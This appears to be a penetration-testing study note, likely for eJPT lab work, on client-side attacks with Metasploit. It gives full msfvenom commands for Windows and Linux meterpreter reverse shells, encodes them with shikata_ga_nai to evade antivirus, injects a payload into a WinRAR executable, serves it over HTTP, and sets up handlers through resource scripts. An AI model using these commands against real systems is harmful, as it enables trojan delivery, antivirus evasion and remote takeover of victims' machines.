Skip to content

Latest commit

 

History

History
179 lines (98 loc) · 13.6 KB

File metadata and controls

179 lines (98 loc) · 13.6 KB

Client-Side Attacks

Client-Side Attacks with MSF

A client-side attack is a security breach that happens on the client side.

  • Social engineering techniques take advantage of human vulnerabilities
  • Require user-interaction to open malicious documents or portable executables (PEs)
  • The payload is stored on the client's system
  • Attackers have to pay attention to Anti Virus detection

Advanced modern antivirus solutions detects and blocks this type of payloads very easily.

Msfvenom Payloads

msfvenom - a Metasploit standalone payload generator and encoder

  • e.g. - generate a malicious meterpreter payload, transfer it to a client target; once executed it will connect back to the payload handler and provides with remote access
  • List available payloads

msfvenom --list payloads

  • When generating a payload the exact name of the payload must be specified
    • target operating system
    • target O.S. architecture (x64, x86 ...)
    • payload type
    • protocol used to connect back (depends on requirements)

e.g. of Staged payload

  • windows/x64/meterpreter/reverse_tcp

e.g. of Non-Staged payload

  • windows/x64/meterpreter_reverse_https

  • Generate a Windows payload with msfvenom

**32bit payload:msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx86.exe​# LHOST = Attacker IP address64bit payload:**msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f exe > /home/kali/certs/ejpt/Windows_Payloads/payloadx64.exe

  • List the output formats available

msfvenom --list formatsFramework Executable Formats [--format <value>]===============================================Name----aspaspxaspx-exeaxis2dllducky-script-pshelfelf-soexeexe-onlyexe-serviceexe-smallhta-pshjarjsploop-vbsmachomsimsi-nouacosx-apppshpsh-cmdpsh-netpsh-reflectionpython-reflectionvbavba-exevba-pshvbswar​Framework Transform Formats [--format <value>]==============================================Name----base32base64bashccsharpdwdwordgogolanghexjavajs_bejs_lenimnimlangnumperlplpowershellps1pypythonrawrbrubyrustrustlangshvbapplicationvbscript

  • Generate a Linux payload with msfvenom

**32bit payload:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx8664bit payload:**msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -f elf > /home/kali/certs/ejpt/Linux_Payloads/payloadx64

  • 📌 Platform and architecture are auto selected if not specified, based on the selected payload

The transferring method onto the target system depends on the type of the social engineering technique.

  • e.g. A simple web server can be set up on the attacker system to serve the payload files and a handler to receive the connection back from the target system

cd /home/kali/certs/ejpt/Windows_Payloadssudo python -m http.server 8080

  • To deal with a meterpreter payload, an appropriate listener is necessary to handle the reverse connection, the multi/handler Metasploit module in this case

msfconsole -quse multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run

  • Download the payload on the Windows 2008 system (in this case my home lab VM) from this link
    • http://192.168.31.128:8080
    • Run the payloadx86.exe payload on the target
  • The meterpreter session on the attacker machine should be opened

Same example with the linux/x86/meterpreter/reverse_tcp Linux payload executed on the Kali VM.

Encoding Payloads

Signature based Antivirus solutions can detect malicious files or executables. Older AV solutions can be evaded by encoding the payloads.

  • This kind of attack vector is outdated and hardly used today.
  • May work on legacy old O.S. like Windows 7 or older.

🗒️ Payload Encoding involves changing the payload shellcode with the aim of changing the payload signature.

🗒️ Shellcode is the code typically used as a payload for exploitation, that provides with a remote command shell on the target system.msfvenom --list encodersmsfvenom --list encoders

  • Excellent encoders are cmd/powershell_base64 and x86/shikata_ga_nai

Windows Payload

  • Generate a Win x86 payload and encode it with shikata_ga_nai:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exemsfvenom shikata_ga_nai Win

  • The payload can be encoded as often as desired by increasing the number of iterations.
  • The more iterations, the better chances to bypass an Antivirus. Use -i option.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

Linux Payload

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86msfvenom shikata_ga_nai Linux

  • Test each of the above generated payloads, like before

cd /home/kali/certs/ejpt/Windows_Payloadssudo python -m http.server 8080msfconsole -q​use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run

📌 Modern antivirus detects and blocks the encoded payload as soon as the download is started:​​

Injecting Payloads into PEs

🗒️ Windows Portable Executable (PE) is a file format for executables, object code, DLLs and others, used in 32-bit and 64-bit Windows O.S.

  • Download a portable executable, e.g. WinRAR
  • Payloads can be injected into PEs with msfvenom with the -x and -k options

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -i 10 -f exe -x winrar-x32-621.exe > /home/kali/certs/ejpt/Windows_Payloads/winrar.execd /home/kali/certs/ejpt/Windows_Payloadssudo python -m http.server 8080msfconsole -q​use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run

  • Transfer and run the winrar.exe file to the target O.S.
  • File description is kept, but not its functionality.

  • Proceed with the Post Exploitation module to migrate the process into another one, in the meterpreter session

run post/windows/manage/migrate

Automation with Resource Scripts

Repetitive tasks and commands can be automated using MSF resource scripts (same as batch scripts).

  • Almost every MSF command can be automated.

ls -al /usr/share/metasploit-framework/scripts/resource/usr/share/metasploit-framework/scripts/resource**e.g. 1**

  • Automate the process of setting up a handler for the generated payloads, by creating a new handler.rc file

nano handler.rc​# Insert the following lines# by specifying the commands sequentially​use multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.31.128set LPORT 1234run​# Save it and exit

  • Load and run the recourse script in msfconsole

msfconsole -q -r handler.rcmsfconsole -q -r handler.rc**e.g. 2nano portscan.rc​# Insert the following lines# by specifying the commands sequentially​use auxiliary/scanner/portscan/tcpset RHOSTS 192.168.31.131run​# Save it and exitmsfconsole -q -r portscan.rcmsfconsole -q -r portscan.rce.g. 3**nano db_status.rc​db_statusworkspaceworkspace -a TESTmsfconsole -q -r db_status.rc

  • 📌 Load up a resource script from within the msfconsole with the resource command

resource /home/kali/certs/ejpt/resource_scripts/handler.rc

  • Typed in commands in a new msfconsole session, can be exported in a new resource script

makerc /home/kali/certs/ejpt/resource_scripts/portscan2.rc